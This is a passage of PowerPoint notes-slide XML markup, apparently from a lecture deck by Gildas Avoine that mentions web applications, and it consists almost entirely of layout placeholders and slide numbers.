          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB25C2CD-B57C-E64B-B77A-26596F0975A0}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5A529FB3-36BC-2D4D-A946-667CC2FC5FC6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F59C4CF2-A0C6-C248-920C-D297E2B3AE42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349186" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349187" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{357A4817-8E69-4749-B391-900B70146167}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5118100" cy="3838575"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380931" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4862513"/>
            <a:ext cx="5680075" cy="4603750"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{56ED4F06-77CF-2440-B447-85CDF9E5B437}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353282" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="768350"/>
            <a:ext cx="5119688" cy="3840163"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709613" y="4864100"/>
            <a:ext cx="5680075" cy="4602163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6D08FB42-4815-4843-A949-5337475A1218}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373762" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373763" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Web Applications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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F5479209-B13C-3F4A-BE7A-137E784651E3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375810" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5116512" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37581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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5E0B8D4E-87CE-8344-A353-A9B4CAC424F5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384002" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384003" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{784836F1-A945-084B-BAB7-A4144A3A23FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{784836F1-A945-084B-BAB7-A4144A3A23FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{784836F1-A945-084B-BAB7-A4144A3A23FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{784836F1-A945-084B-BAB7-A4144A3A23FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{784836F1-A945-084B-BAB7-A4144A3A23FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386050" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyP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a:t>Gildas Avoine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{305E72F3-75F2-6E4B-BC98-77FA2486BC45}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="766763"/>
            <a:ext cx="5119687" cy="3840162"/>
          </a:xfrm>
          <a:ln/>
          <a:extLst>
            <a:ext uri="{FAA26D3D-D897-4be2-8F04-BA451C77F1D7}">
              <ma14:placeholderFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="4862513"/>
            <a:ext cx="5676900" cy="4605337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Par exemple dans le titre d</a:t>
            </a:r>
            <a:r>
